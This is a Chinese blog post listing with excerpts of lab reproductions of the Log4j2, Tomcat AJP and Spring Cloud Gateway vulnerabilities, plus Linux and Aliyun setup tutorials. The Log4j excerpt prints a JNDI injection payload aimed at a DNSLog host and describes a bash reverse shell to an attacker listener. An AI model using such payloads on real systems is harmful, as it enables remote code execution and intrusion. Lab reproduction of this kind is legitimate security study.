- 博客(12)
- 收藏
- 关注
RSS订阅原创 Apache_log4j2(CVE-2021-44228)复现
我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。通过DNSLog平台(http://www.dnslog.cn/)获取到域名xxx.dnslog.cn,构造payload ${jndi:ldap://http://xxx.dnslog.cn}此处kali得ip为192.168.14.131 端口设置未使用得端口 并将反弹shell进行java runtime bash 编码。端口监听到数据 并且可以进行命令执行。
2022-12-19 16:31:46
134
1
原创 cve-2020-1938 复现
2, AJP 1.3协议存在缺陷,导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步实现远程代码的执行。Tomcat默认的conf/server.xml中配置了2个Connector,一个为8080的对外提供的HTTP协议端口,另外一个就是默认的8009 AJP协议端口。1, AJP Connector暴露给客户端了,AJP是Tomcat和其他web服务器之间内部使用的。发现aip协议的8009的端口开放。
2022-12-15 17:22:57
131
原创 CVE-2022-22947 Spring Cloud Gateway RCE 复现
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执行任意远程执行的请求。如果不需要Actuator,可以通过management.endpoint.gateway.enable:false配置将其禁用。官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。
2022-12-14 15:29:08
469
原创 编写shell脚本 实现滚动显示文本文件内容
直接上脚本内容#!/bin/bash[ $# -le 0 ] && echo “使用方法 :$0 <滚动频率> <开始时需要显示的行数> <文本文件1的绝对路径> <文本文件2的绝对路径>” && echo “退出按 ctrl+c”&& exit 1#判断接收的频率参数是否大于0#if [[ 1= [0−9]∗1 =~ ^[0-9]*1= [0−9]∗ ]]thenif [ $1
2021-05-14 09:42:13
859
原创 安装环回网卡
实验环境(1)Windows 7 操作系统(2)VMware15(4)CentOS-71.按下 win + R 键,在其中输入:hdwwiz,然后点击“确定”上面的xx.24.29…1为给linux 服务器的ip地址打开虚拟机,选择“编辑”->“虚拟网络编辑器”,确保“桥接到”Microsoft LoopbackAdapter。进入linux中 对网卡进行配置退出并保存配置文件,重启网卡 ens33(不一定是ens33)ifdown ens33ifup ens33
2021-04-10 16:00:42
285
原创 Linux yum 本地源配置
1.、装入 Centos 7 光盘进入虚拟机设置中得CD/DVD然后连接光盘:虚拟机-> 可移动设备 -> CD/DVD(IDE) -> 连接2、 挂装 CENTOS7 光盘系统默认将光盘自动挂装在/run/media/root/CentOS\ 7\ x86_64/ 上(注意反斜杠“\”表示后面有转义字符,此处是空格“ ”)。由于该目录路径有 2 个空格,不方便书写,我们用 ln 命令建立一个链接文件/media/cdrom 指向它,以后访问/media/cdrom 就能直
2021-04-10 15:42:19
327
原创 阿里云大学 7天训练营 进阶班 第五天
搭建个人Leanote云笔记本MongoDB是一个基于分布式文件存储的高性能数据库,介于关系数据库和非关系数据库之间,它支持的数据结构非常松散是类似于json和bson格式,因此可以存储比较复杂的数据类型。Mongo最大的特点是它支持的查询语言非常强大,其语法有点类似于面向对象的查询语言,几乎可以实现类似关系数据库单表查询的绝大部分功能,而且还支持对数据建立索引。Leanote云笔记使用MongoDB作为后端数据库,按照以下步骤按照MongoDB数据库。连接ECS服务器,然后通过客户端连接服务器ss
2021-03-26 21:37:09
72
原创 阿里云大学 7天训练营 进阶班 第四天
使用PolarDB和ECS搭建门户网站1.在 阿里云控制台首页 左侧导航栏,依次单击 产品与服务 > 云数据库PolarDB ,进入 云数据库PolarDB管理控制台 。2. 创建数据库账号a. 在 集群列表 页面,单击 集群ID ,进入 集群详情界面 。b. 单击左侧导航栏 配置与管理 > 账号管理 。c. 单击左上方 创建账号3. 设置数据库白名单在白名单界面将默认的白名单地址127.0.0.1更改为 0.0.0.0/0,然后点击 [确定] 使白名单地址生效。通过客
2021-03-25 16:05:35
87
原创 阿里云大学 7天训练营 进阶班 第三天
负载均衡配置本小节的主要内容:将两台服务器挂载到负载均衡的后端,这样,用户只需访问一个IP地址或域名,负载均衡服务器将会根据权重自动转发用户请求到相应的后端服务器上。进入控制台,点击左侧导航栏的 产品与服务 ,下拉菜单中,在 弹性计算 条目下选择 负载均衡 。点击左侧的 实例管理 ,然后打开实验提供的实例,在实例列表页面,点击目标实例右侧的 点我开始配置 。通过负载均衡业务配置向导,配置负载均衡的 监听端口、后端服务器 和 健康检查 :1)在 协议&监听 页面,输入如下信息,完成后,点击
2021-03-25 15:02:30
57
原创 阿里云大学 7天训练营 进阶班 第二天
阿里云大学 7天训练营 进阶班 第二天1.连接ECS服务器打开ECS 并通过Powershell 在终端中输入连接命令ssh [username]@[ipaddress] 登录ECS服务器2.安装Docker CE安装Docker的依赖库yum install -y yum-utils device-mapper-persistent-data lvm2添加Docker CE的软件源信息。yum-config-manager --add-repo http://mirrors.aliyun.
2021-03-23 18:49:20
105
原创 阿里云大学 7天训练营 进阶班 第一天
1.远程连接ECS服务器打开系统自带的终端工具。Windows:CMD或Powershell。MAC:Terminal。Windows用户请检查系统中是否安装有ssh工具。检查方法:a. 在终端中输入命令ssh -V。b. 出现版本信息 说明已安装。c. 否则请下载安装OpenSSH。在终端中输入连接命令 ssh [username]@[ipaddress]。将其中的 username 和 ipaddress 替换为云产品资源提供的ECS服务器的 用户和 弹性IP。例如:ssh root@1
2021-03-22 23:03:33
112
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人